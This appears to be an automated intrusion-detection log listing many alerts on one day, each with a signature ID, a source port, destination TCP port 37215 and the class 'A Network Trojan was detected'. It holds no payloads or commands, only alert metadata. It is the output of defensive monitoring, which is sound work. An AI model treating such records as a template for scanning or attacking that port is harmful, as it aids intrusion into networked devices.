                SID:2829579
                Source Port:34488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434486
                SID:2829579
                Source Port:39864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795289
                SID:2829579
                Source Port:57796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856004
                SID:2835222
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764317
                SID:2835222
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823574
                SID:2829579
                Source Port:55454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966568
                SID:2829579
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177105
                SID:2835222
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782745
                SID:2829579
                Source Port:60998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257237
                SID:2835222
                Source Port:37934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524435
                SID:2835222
                Source Port:35132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133656
                SID:2835222
                Source Port:55338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166152
                SID:2829579
                Source Port:53696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966612
                SID:2829579
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427499
                SID:2829579
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626936
                SID:2829579
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112961
                SID:2829579
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555755
                SID:2829579
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808391
                SID:2835222
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966994
                SID:2829579
                Source Port:39480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618793
                SID:2829579
                Source Port:33422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928310
                SID:2835222
                Source Port:33542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862970
                SID:2835222
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286674
                SID:2829579
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688181
                SID:2829579
                Source Port:41048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320985
                SID:2835222
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166086
                SID:2829579
                Source Port:34748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559205
                SID:2829579
                Source Port:50994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037700
                SID:2829579
                Source Port:37914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038436
                SID:2835222
                Source Port:55052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473446
                SID:2829579
                Source Port:40954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799447
                SID:2829579
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441612
                SID:2835222
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726065
                SID:2829579
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230141
                SID:2829579
                Source Port:38958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507243
                SID:2835222
                Source Port:57600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560937
                SID:2835222
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524012
                SID:2829579
                Source Port:40104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893531
                SID:2829579
                Source Port:44104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223144
                SID:2835222
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945278
                SID:2829579
                Source Port:56242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039783
                SID:2829579
                Source Port:37756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948565
                SID:2829579
                Source Port:60032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767649
                SID:2835222
                Source Port:45754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787756
                SID:2829579
                Source Port:41586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916080
                SID:2829579
                Source Port:51152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686734
                SID:2835222
                Source Port:36736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557119
                SID:2829579
                Source Port:36344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169217
                SID:2835222
                Source Port:40706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466557
                SID:2829579
                Source Port:38092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071309
                SID:2835222
                Source Port:52302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979651
                SID:2835222
                Source Port:35708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561122
                SID:2829579
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981953
                SID:2835222
                Source Port:51764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141777
                SID:2829579
                Source Port:39124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168722
                SID:2829579
                Source Port:56772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556950
                SID:2829579
                Source Port:38512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365924
                SID:2835222
                Source Port:35080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326072
                SID:2835222
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243131
                SID:2829579
                Source Port:50096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993610
                SID:2829579
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801185
                SID:2829579
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361331
                SID:2835222
                Source Port:60506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019186
                SID:2835222
                Source Port:56554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556758
                SID:2835222
                Source Port:37436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855926
                SID:2829579
                Source Port:43806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868543
                SID:2835222
                Source Port:45618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373814
                SID:2835222
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518976
                SID:2835222
                Source Port:48932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066666
                SID:2829579
                Source Port:54666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903739
                SID:2829579
                Source Port:58562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614766
                SID:2829579
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762837
                SID:2829579
                Source Port:38720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113372
                SID:2835222
                Source Port:44640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987230
                SID:2829579
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007595
                SID:2835222
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655659
                SID:2835222
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331565
                SID:2829579
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864391
                SID:2835222
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653202
                SID:2835222
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586774
                SID:2829579
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915843
                SID:2835222
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960853
                SID:2829579
                Source Port:57086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173182
                SID:2829579
                Source Port:49464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574490
                SID:2829579
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798013
                SID:2835222
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280429
                SID:2835222
                Source Port:47492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008777
                SID:2829579
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859905
                SID:2829579
                Source Port:38368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235483
                SID:2829579
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264246
                SID:2835222
                Source Port:44462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722236
                SID:2835222
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725402
                SID:2835222
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013563
                SID:2835222
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228649
                SID:2835222
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326046
                SID:2829579
                Source Port:43800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292195
                SID:2835222
                Source Port:46636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336191
                SID:2835222
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770426
                SID:2829579
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868291
                SID:2829579
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629281
                SID:2829579
                Source Port:42698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271287
                SID:2829579
                Source Port:33228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113424
                SID:2829579
                Source Port:46844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322222
                SID:2829579
                Source Port:46862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286349
                SID:2835222
                Source Port:34758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785409
                SID:2835222
                Source Port:39106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903657
                SID:2829579
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928202
                SID:2835222
                Source Port:55476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263848
                SID:2835222
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559377
                SID:2835222
                Source Port:47528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712695
                SID:2829579
                Source Port:54678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520508
                SID:2835222
                Source Port:41378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874663
                SID:2829579
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667853
                SID:2829579
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237323
                SID:2829579
                Source Port:39902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810888
                SID:2835222
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786865
                SID:2835222
                Source Port:52258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437218
                SID:2835222
                Source Port:59012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980740
                SID:2835222
                Source Port:46646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734624
                SID:2829579
                Source Port:55958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419762
                SID:2829579
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732339
                SID:2835222
                Source Port:55286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361558
                SID:2829579
                Source Port:53956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779585
                SID:2835222
                Source Port:44462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863899
                SID:2829579
                Source Port:42216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811447
                SID:2829579
                Source Port:38140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331539
                SID:2829579
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653422
                SID:2829579
                Source Port:60486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414133
                SID:2835222
                Source Port:47862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574224
                SID:2835222
                Source Port:47894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176987
                SID:2829579
                Source Port:59600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466219
                SID:2829579
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977267
                SID:2829579
                Source Port:57332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870108
                SID:2835222
                Source Port:51788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324723
                SID:2829579
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227845
                SID:2829579
                Source Port:36636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653495
                SID:2835222
                Source Port:60896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521750
                SID:2835222
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362986
                SID:2829579
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444724
                SID:2829579
                Source Port:52874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719550
                SID:2835222
                Source Port:42760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023437
                SID:2835222
                Source Port:49796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457923
                SID:2829579
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659570
                SID:2829579
                Source Port:51816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873157
                SID:2829579
                Source Port:33082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935236
                SID:2829579
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862115
                SID:2835222
                Source Port:39024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705014
                SID:2835222
                Source Port:41376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798425
                SID:2835222
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381243
                SID:2829579
                Source Port:36314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977782
                SID:2829579
                Source Port:59736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224414
                SID:2835222
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982279
                SID:2835222
                Source Port:35080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712762
                SID:2829579
                Source Port:38734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317851
                SID:2829579
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575789
                SID:2835222
                Source Port:59526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853372
                SID:2829579
                Source Port:36114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694037
                SID:2835222
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714495
                SID:2835222
                Source Port:57262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580084
                SID:2835222
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288510
                SID:2835222
                Source Port:50100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275429
                SID:2835222
                Source Port:37248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653842
                SID:2835222
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335228
                SID:2835222
                Source Port:37584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427361
                SID:2829579
                Source Port:56842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459017
                SID:2835222
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136061
                SID:2829579
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499764
                SID:2835222
                Source Port:42866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568999
                SID:2835222
                Source Port:45330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728622
                SID:2835222
                Source Port:34890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840358
                SID:2835222
                Source Port:50262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715375
                SID:2829579
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862804
                SID:2829579
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897583
                SID:2835222
                Source Port:58184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764080
                SID:2829579
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559893
                SID:2829579
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728330
                SID:2835222
                Source Port:38684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586112
                SID:2835222
                Source Port:48614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397250
                SID:2835222
                Source Port:56972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506292
                SID:2835222
                Source Port:57148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667935
                SID:2829579
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538129
                SID:2829579
                Source Port:51628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222877
                SID:2835222
                Source Port:53860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663680
                SID:2835222
                Source Port:42868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711444
                SID:2829579
                Source Port:54324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864512
                SID:2829579
                Source Port:57984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612235
                SID:2829579
                Source Port:52662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419349
                SID:2835222
                Source Port:39638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840928
                SID:2829579
                Source Port:52110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943195
                SID:2829579
                Source Port:49538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316043
                SID:2829579
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773694
                SID:2835222
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943890
                SID:2829579
                Source Port:55050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561712
                SID:2829579
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584562
                SID:2829579
                Source Port:50750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572264
                SID:2835222
                Source Port:38442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537566
                SID:2835222
                Source Port:47466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069800
                SID:2835222
                Source Port:58128
                Destination Port:37215
